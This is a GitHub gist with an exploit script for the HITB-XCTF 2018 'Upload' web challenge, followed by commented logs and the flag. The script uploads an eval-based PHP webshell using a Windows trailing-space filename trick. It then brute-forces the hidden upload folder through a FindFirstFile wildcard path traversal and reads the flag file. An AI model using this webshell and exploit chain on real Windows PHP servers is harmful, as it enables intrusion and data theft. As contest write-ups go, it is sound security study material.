Created
April 14, 2018 07:49
-
-
Save pich4ya/173354fe04712ac233168f9b937acd3d to your computer and use it in GitHub Desktop.
HITB-XCTF 2018 - Upload (Web) Writeup
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # @author LongCat (Pichaya Morimoto) | |
| import requests, string | |
| # On Windows OS move_uploaded_file function will convert "foo.php" | |
| # followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to "foo.php". | |
| # http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ | |
| files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')} | |
| values = {'submit': 'upload'} | |
| phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip() | |
| print phpshell | |
| files = {'file': ('justJPG.jpg', open('justJPG.jpg', 'rb'))} | |
| justJPG = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip() | |
| folderName='' | |
| while True: | |
| if 200 == requests.get('http://47.90.97.18:9999/{}/{}'.format(folderName,phpshell)).status_code: | |
| print "Done: {}/{}".format(folderName, phpshell) | |
| break | |
| for c in string.printable: | |
| # winAPI FindFirstFile() bug: http://seclists.org/fulldisclosure/2011/Jan/409 | |
| url = 'http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/{}{}</{}'.format(folderName,c,justJPG) | |
| print url | |
| res = requests.get(url) | |
| if 'width=' in res.text: | |
| folderName+=c | |
| print folderName | |
| break | |
| # disable_functions= assert,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen | |
| # var_dump(glob('../*'));readfile('../flag.php'); | |
| print requests.post('http://47.90.97.18:9999/{}/{}'.format(folderName, phpshell), data={'0': "readfile('../flag.php');"}).text | |
| # 1523672199.php | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/0</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/1</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/2</1523672199.jpg | |
| # ... | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d</1523672199.jpg | |
| # 87194f13726af7cee27ba2cfe97b60d | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d0</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d1</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d2</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d3</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d4</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d5</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d6</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d7</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d8</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60d9</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60da</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60db</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60dc</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60dd</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60de</1523672199.jpg | |
| # http://47.90.97.18:9999/pic.php?filename=../../../Inetpub/wwwroot/87194f13726af7cee27ba2cfe97b60df</1523672199.jpg | |
| # 87194f13726af7cee27ba2cfe97b60df | |
| # Done: 87194f13726af7cee27ba2cfe97b60df/1523672199.php | |
| # <?php | |
| # echo "flag is here"; | |
| # //HITB{e5f476c1e4c6dc66278db95f0b5a228a} | |
| # ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
full writeup https://medium.com/@u0x/ลองแฮกช่องโหว่ใน-winapi-findfirstfile-205b0d997042